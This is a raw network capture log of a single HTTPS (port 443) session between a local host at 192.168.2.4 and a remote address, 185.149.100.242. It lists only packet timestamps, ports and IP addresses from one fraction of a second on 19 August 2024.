Aug 19, 2024 09:28:40.053807020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.053833008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100091934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100119114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100194931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.100224018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100239992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.100847960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100872993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100908995 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.100917101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.100936890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.107917070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.107935905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108030081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.108051062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108259916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108272076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108304024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.108310938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108330965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.108859062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108875990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108908892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.108916044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.108932972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.109400988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.109414101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.109441042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.109448910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.109463930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.110234976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.110250950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.110291958 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.110301018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.148224115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.148238897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.148430109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.148448944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.193866968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.193892002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.194155931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.194159031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.194171906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.194189072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.194237947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.194271088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.200656891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.200675011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.200725079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.200740099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.200778008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.200798988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.200953960 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.200973988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.201011896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.201020956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.201045036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.201061964 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202018976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202033997 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202076912 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202083111 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202112913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202269077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202285051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202315092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202321053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202338934 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202354908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202594042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202609062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202656031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.202661991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.202716112 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.205985069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.241046906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.241065979 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.241194963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.241221905 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.241264105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.286250114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286271095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286426067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.286465883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286505938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.286787033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286801100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286837101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.286844969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.286871910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.286890030 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.293227911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293247938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293325901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.293344975 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293379068 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.293582916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293600082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293637991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.293646097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.293674946 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.294466972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294481993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294527054 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.294534922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294567108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.294722080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294738054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294776917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.294783115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.294814110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.295222044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.295239925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.295274019 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.295280933 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.295312881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.295331001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.296291113 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.333873034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.333906889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.334062099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.334094048 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.334151983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.379539967 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379574060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379663944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.379695892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379738092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.379766941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379785061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379816055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.379822969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.379853964 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.388139009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.388170004 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.388273954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.388300896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.388338089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.389899969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.389923096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.389974117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.389987946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390002966 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390022993 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390131950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390153885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390191078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390199900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390222073 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390240908 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390377998 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390393972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390434027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390443087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390472889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390671968 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390693903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390727043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390733957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.390758991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.390774965 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.404268980 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.426934958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.426961899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.427073002 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.427107096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.427145004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.472568035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.472594976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.472657919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.472682953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.472685099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.472723007 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.472748041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.480865955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.480891943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.480972052 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.480990887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482279062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482304096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482381105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.482393980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482784986 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482801914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482831955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.482840061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.482860088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.483093977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.483115911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.483144045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.483150005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.483167887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.483490944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.483505964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.483558893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.483567953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.519036055 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.519064903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.519242048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.519242048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.519268990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.559822083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.565341949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565360069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565499067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.565519094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565567017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.565869093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565886021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565926075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.565934896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.565965891 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.576556921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.576579094 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.576653957 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.576668978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.576704025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578270912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578289032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578346014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578356028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578393936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578394890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578409910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578428030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578440905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578448057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578463078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578491926 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578866959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578886032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578921080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578927040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.578936100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.578958988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.579827070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.579847097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.579885960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.579893112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.579920053 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.579938889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.611627102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.611648083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.611701012 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.611718893 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.611747026 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.611766100 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.662566900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.662592888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.662640095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.662646055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.662664890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.662693024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.662729979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.669462919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.669483900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.669548988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.669564009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.670866013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.670896053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.670929909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.670938969 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.670978069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.671139002 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671154976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671185017 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.671192884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671205044 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.671403885 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671422958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671447039 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.671452999 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.671478987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.672275066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.672292948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.672322989 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.672329903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.672346115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.704128027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.704155922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.704252005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.704292059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.747314930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.755847931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.755872011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.755925894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.755970001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.755980968 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.756002903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.756033897 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.761889935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.761908054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.761960983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.761977911 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.761998892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.763216972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.763241053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.763271093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.763279915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.763300896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.763732910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.763747931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.763792992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.763803005 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764231920 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764259100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764285088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.764292955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764312029 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.764847994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764866114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764903069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.764911890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.764941931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.796849966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.796878099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.796953917 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.796976089 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.797003031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.841063023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.850893021 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.850919008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.851157904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.851190090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.851212025 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.851238012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.851250887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.851288080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.854729891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.854751110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.854808092 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.854823112 CEST	443	49759	185.149.100.242	192.168.2.4
